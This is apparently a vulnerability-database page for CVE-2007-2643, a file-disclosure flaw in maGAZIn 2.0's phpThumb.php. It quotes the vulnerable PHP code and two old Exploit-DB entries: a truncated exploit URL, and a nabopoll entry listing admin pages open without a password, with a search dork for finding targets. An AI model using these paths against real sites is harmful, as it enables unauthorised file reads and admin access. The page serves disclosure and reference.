CVE-2007-2643
published 2007-05-13CVE-2007-2643: Directory traversal vulnerability in phpThumb.php in PinkCrow Designs Gallery or maGAZIn 2.0 allows remote attackers to read arbitrary files via a .. (dot dot)…
PriorityP431medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
3.74%
88.5th percentile
Directory traversal vulnerability in phpThumb.php in PinkCrow Designs Gallery or maGAZIn 2.0 allows remote attackers to read arbitrary files via a .. (dot dot) in the src parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pinkcrow_designs | designs_gallery_magazin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
exploitdb·2007-05-11
CVE-2007-2643 maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
maGAZIn 2.0 - 'PHPThumb.php?src' Remote File Disclosure
---
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ [email protected] ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
[!] Portal : maGAZIn v2.0
[!] Download : http://www.pinkcrow.net/Scripts/gallery.php
[!] Type : Remote File Disclosure Vulnerability
Vuln Code : Line (152 - 157)
[Code]
if ($fp = @fopen($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 'rb')) {
$OriginalImageData = fread($fp, filesize($_SERVER['DOCUMENT_ROOT'].$_REQUEST['src']));
fclose($fp);
} else {
ErrorImage('cannot open '.$_SERVER['DOCUMENT_ROOT'].$_REQUEST['src'], 400, 50);
}
[/Code]
Bug :
http://[Target]/[Path]/phpT
Exploit-DB
nabopoll 1.2 - Remote Unprotected Admin Section
exploitdb·2007-02-13
CVE-2007-0873 nabopoll 1.2 - Remote Unprotected Admin Section
nabopoll 1.2 - Remote Unprotected Admin Section
---
* nabopoll 1.1.2 sensitive file (admin without password)
* By : sn0oPy
* Risk : high
* site : http://nabocorp.com/
* Dork : inurl:"nabopoll/"
* exploit :
acces without password to :
http://target/nabopoll/admin/config_edit.php
http://target/nabopoll/admin/template_edit.php
http://target/nabopoll/admin/survey_edit.php
* contact : sn0oPy (at) avenir-geopolitique (dot) net [email concealed]
* greetz : [subzero], Avg Team(forums.avenir-geopolitique.net).
http://forums.avenir-geopolitique.net/viewtopic.php?t=2643
# milw0rm.com [2007-02-13]
No writeups or analysis indexed.
http://0day.2600.ir/exploits/3901http://osvdb.org/36016http://secunia.com/advisories/25262http://www.securityfocus.com/bid/23943http://www.vupen.com/english/advisories/2007/1782https://exchange.xforce.ibmcloud.com/vulnerabilities/34240https://www.exploit-db.com/exploits/3901http://0day.2600.ir/exploits/3901http://osvdb.org/36016http://secunia.com/advisories/25262http://www.securityfocus.com/bid/23943http://www.vupen.com/english/advisories/2007/1782https://exchange.xforce.ibmcloud.com/vulnerabilities/34240https://www.exploit-db.com/exploits/3901
2007-05-13
Published